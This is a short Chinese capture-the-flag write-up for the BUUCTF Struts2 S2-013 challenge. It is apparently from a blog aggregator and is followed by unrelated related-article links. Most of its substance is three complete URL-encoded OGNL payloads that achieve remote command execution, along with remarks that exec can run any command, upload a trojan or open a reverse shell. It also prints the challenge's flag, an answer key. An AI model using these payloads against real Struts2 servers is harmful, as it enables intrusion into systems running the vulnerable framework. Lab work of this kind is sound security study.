BUUCTF-Real-[struts2]s2-013

2024-02-04 05:28
文章标签 buuctf struts2 013 real s2

本文主要是介绍BUUCTF-Real-[struts2]s2-013,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧! 

struts2的标签中 <s:a> 和 <s:url> 都有一个 includeParams 属性,可以设置成如下值none - URL中不包含任何参数(默认)
get - 仅包含URL中的GET参数
all - 在URL中包含GET和POST参数
当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。此时<s:a> 或<s:url>尝试去解析原始请求参数时,会导致OGNL表达式的执行

在s2-013中,因为参数的问题导致rce漏洞的出现!

payload:1、http://node5.buuoj.cn:27491/?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27id%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D2、http://node5.buuoj.cn:27491/?redirect:%24%7b%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2c%23f.setAccessible(true)%2c%23f.set(%23_memberAccess%2ctrue)%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%22echo+dqub23akjj21sd2kx75xa123f%22).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b5000%5d%2c%23c.read(%23d)%2c%23genxor%3d%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2c%23genxor.println(%23d)%2c%23genxor.flush()%2c%23genxor.close()%7d3、  Url: http://node5.buuoj.cn:27491/Vulnerable: TrueMethod: POSTPosition: dataPayload: redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27id%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

一般使用第一个第二个即可!

这里的payload是经过url编码的!

在payload里面exec函数里面执行任意命令!可以上传木马!可以多姿势反弹shell! 

flag在环境变量里面,使用exec函数执行env命令即可!

flag{9a1b6b01-d8b0-4021-92b7-9e2a9049e8f9}

这篇关于BUUCTF-Real-[struts2]s2-013的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/676468

相关文章

Struts2与struts1与springmvc比较

Struts2与struts1与springmvc比较

最近做项目用到了struts2,之前一直是用struts1和springMVC。感觉到了struts2从很大程度上和这两个还是有很大区别的,所以今天搜集了些资料,给他们做一下对比。            Struts1官方已经停止更新,现在用的也比较少,这里主要讲一下struts2和struts1比较都有哪些不同和进步。Struts2可以说不是完全从struts1改进来的,因为
阅读更多...
struts2(三)---struts2中的服务端数据验证框架validate

struts2(三)---struts2中的服务端数据验证框架validate

struts2为我们提供了一个很好的数据验证框架–validate,该框架可以很方便的实现服务端的数据验证。 ActionSupport类提供了一个validate()方法,当我们需要在某一个action中进行数据验证时,可以重写这个方法。数据验证往往是在客户端向服务端提交表单信息时进行的,比如execute方法负责处理表单信息并返回相应的结果,在此之前,validate会先对提交的表单信息进
阅读更多...
struts2(二)---ModelDriven模型驱动

struts2(二)---ModelDriven模型驱动

这篇文章是在上一篇文章(http://blog.csdn.net/u012116457/article/details/48194905)的基础上写的,大家可以先快速阅读一下上一篇。 这篇文章用来写一下struts中的模型驱动机制modelDriven 1.为什么要用modelDriven struts中Action 用来处理业务逻辑,如果向上一篇文章中的做法,把实体类的属性及get se
阅读更多...
Struts2(一)---struts2的环境搭建及实例

Struts2(一)---struts2的环境搭建及实例

刚刚接触struts2,有点懵懵懂懂,还是习惯于先写代码,然后慢慢来理解其中的思想。 这篇文章主要内容是strusts的环境搭建及通过一个简单的例子来理解到底是怎么使用struts来简化编程的。 1.项目结构如下如,包括必须的包 2.web.xml <?xml version="1.0" encoding="UTF-8"?><web-app version="3.0" xmlns="
阅读更多...
ajax+json+Struts2实现list传递(转载)

ajax+json+Struts2实现list传递(转载)

一、首先需要下载JSON依赖的jar包。它主要是依赖如下:       json-lib-2.2.2-jdk15       ezmorph-1.0.4       commons-logging-1.0.4       commons-lang-2.4       commons-collections-3.2.1       commons-beanutils      二、
阅读更多...
Struts2 s:token/标签 防止表单多次提交

Struts2 s:token/标签 防止表单多次提交

<span style="font-size:10px;">1、使用Struts2的表单标签,其中需要增加token标签。如下:……Java代码<%@ taglib uri="/struts-tags" prefix="s" %> …… <s:form action="page1" theme="simple"> <s:datetimepicker name="order.dat
阅读更多...
struts2中s:doubleselect/标签的使用(转)

struts2中s:doubleselect/标签的使用(转)

先看bean中的代码: //城市对象 public class CityBean { private int cityid; private String cityname; public int getCityid() { return cityid; } public void setCityid(int cityid) { this.cityid = cityid; } pub
阅读更多...
论文阅读--Cross-view Transformers for real-time Map-view Semantic Segmentation

论文阅读--Cross-view Transformers for real-time Map-view Semantic Segmentation

一种新的2D维度的bev特征提取方案,其通过引入相机先验信息(相机内参和外参)构建了一个多视图交叉注意力机制,能够将多视图特征映射为BEV特征。 cross view attention:BEV位置编码+由根据相机标定结果(内参和外参)演算得到的相机位置编码+多视图特征做attention得到 整体上文章的网络前端使用CNN作为特征抽取网络,中端使用CNN多级特征作为输入在多视图下优化BEV特
阅读更多...
实时语义分割--ICNet for Real-Time Semantic Segmentation on High-Resolution Images

实时语义分割--ICNet for Real-Time Semantic Segmentation on High-Resolution Images

github代码:https://github.com/hszhao/ICNet 语义分割算法精度和速度对比: 由图可以看出,ResNet38,PSPNet,DUC精度虽然较高,但是无法速度相对较慢,无法达到实时,ENet速度较快,但精度较低,而本文算法既可以达到实时,精度也相对较高. Speed Analysis PSPNet50的处理不同大小的输入图像所需时间: 图中,sta
阅读更多...
YOLO: Real-Time Object Detection解读

YOLO: Real-Time Object Detection解读

YOLO不同于RCNN系列分为region proposal和classification,YOLO是直接输出box位置和box所属的类别,整张图都是网络的输入,是个回归问题。 YOLO的主要特点: 速度快,能够达到实时的要求。在 Titan X 的 GPU 上 能够达到 45 帧每秒。使用全图作为 Context 信息,背景错误(把背景错认为物体)比较少。泛化能力强。在自然图像上训练好的
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2